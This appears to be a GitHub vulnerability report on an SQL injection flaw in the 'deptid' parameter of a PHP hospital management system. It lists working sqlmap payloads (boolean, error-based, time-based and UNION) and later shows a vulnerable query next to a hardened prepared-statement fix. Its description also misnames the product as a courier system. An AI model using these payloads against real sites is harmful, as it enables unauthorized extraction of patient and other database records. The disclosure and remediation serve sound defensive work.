
SourceCodester Online Hospital Management System Using PHP/MySQL departmentDoctor.php V1.0 SQL injection vulnerability #41

Open
1097hzy opened this issue May 23, 2024 · 0 comments


1097hzy commented May 23, 2024

NAME OF AFFECTED PRODUCT(S)

  • Online Hospital Management System Using PHP/MySQL

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • ZhaoBin Huang

Vulnerable File

  • departmentDoctor.php

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • SQL injection

Root Cause

  • The fourth line of the departmentDoctor.php file uses the PHP method to retrieve user input from the $_GET element. The value of this element is then passed on to the code without proper sanitization or validation, and is ultimately used for a database query in the PHP method on line 5 of the departmentDoctor.php file. This may lead to SQL injection attacks.

Impact

  • Attackers can exploit this vulnerability to gain database privileges, which can result in the exposure of a large amount of data in the database. If the other party's database has DBA privileges, this may lead to server host privileges being obtained.

DESCRIPTION

  • ZhaoBin Huang has discovered that, due to insufficient protection of the "deptid" parameter in the "\departmentDoctor.php" file, there is a serious security vulnerability in "Best courier management system project in php". This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.

Payload

  • deptid=12' AND (SELECT 2306 FROM(SELECT COUNT(*),CONCAT(0x716b707671,(SELECT (ELT(2306=2306,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vptK'='vptK
---
Parameter: deptid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: deptid=12' AND 9424=9424 AND 'hYov'='hYov
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: deptid=12' AND (SELECT 2306 FROM(SELECT COUNT(*),CONCAT(0x716b707671,(SELECT (ELT(2306=2306,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vptK'='vptK
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: deptid=12' AND (SELECT 3022 FROM (SELECT(SLEEP(5)))IfUz) AND 'rvxr'='rvxr
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: deptid=12' UNION ALL SELECT CONCAT(0x716b707671,0x6b5a4352647756625962434873434d55424c6d437a47745664726d4b736c52667772717653687444,0x71786a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
    Vector:  UNION ALL SELECT [QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
  • This shows the payload being run by sqlmap.
  • The following is the database name, displayed by running sqlmap as confirmation of a successful attack.
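The report describes the classic shape of this bug: a value read from $_GET is spliced into the SQL text, so a single quote in the parameter changes the query. The following PHP is an added illustration written for this page; it is not the project's departmentDoctor.php and the table and column names (doctors, id, name, deptid) are assumed. It shows the vulnerable pattern next to a hardened handler that validates deptid as an integer and binds it through a prepared statement, then runs the validator offline against the report's own sample payloads.

```php
<?php
// Added example, not code from the project. Table/column names are assumed.

// --- Vulnerable pattern (the shape described in the Root Cause section) ---
// The raw parameter is concatenated into the query text, so any quote
// character in it is interpreted as SQL rather than as data.
function lookupDoctorsUnsafe(mysqli $db, array $get): mysqli_result|false
{
    $deptid = $get['deptid'];
    $sql = "SELECT * FROM doctors WHERE deptid='" . $deptid . "'";
    return $db->query($sql);
}

// --- Hardened version ---
// 1. Type validation: a department id is a positive integer, so anything
//    else is rejected before the database is ever involved.
function parseDeptId(array $get): ?int
{
    if (!isset($get['deptid'])) {
        return null;
    }
    $id = filter_var(
        $get['deptid'],
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    return $id === false ? null : $id;
}

// 2. Prepared statement: the value travels to the server as a bound
//    parameter and can never be interpreted as part of the SQL text.
function lookupDoctorsSafe(mysqli $db, array $get): ?array
{
    $deptid = parseDeptId($get);
    if ($deptid === null) {
        http_response_code(400);   // reject malformed input instead of querying
        return null;
    }
    $stmt = $db->prepare('SELECT id, name FROM doctors WHERE deptid = ?');
    $stmt->bind_param('i', $deptid);
    $stmt->execute();
    $stmt->bind_result($id, $name);
    $rows = [];
    while ($stmt->fetch()) {
        $rows[] = ['id' => $id, 'name' => $name];
    }
    $stmt->close();
    return $rows;
}

// Offline check of the validator against the report's sample payloads
// (constructed input; no database connection is needed for this part).
$samples = [
    '12',
    "12' AND 9424=9424 AND 'hYov'='hYov",
    "12' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -",
];
foreach ($samples as $s) {
    $parsed = parseDeptId(['deptid' => $s]);
    printf("%-75s => %s\n", $s, $parsed === null ? 'rejected' : "deptid=$parsed");
}
```

Only the first sample survives parseDeptId; the boolean-based and UNION payloads from the sqlmap output are rejected at the type check, and even a value that did pass would reach MySQL as a bound integer rather than as query text. Validation and binding are independent layers: the prepared statement alone already closes the injection, and the integer check additionally keeps garbage out of the application logic and gives the web server log a clean 400 to alert on.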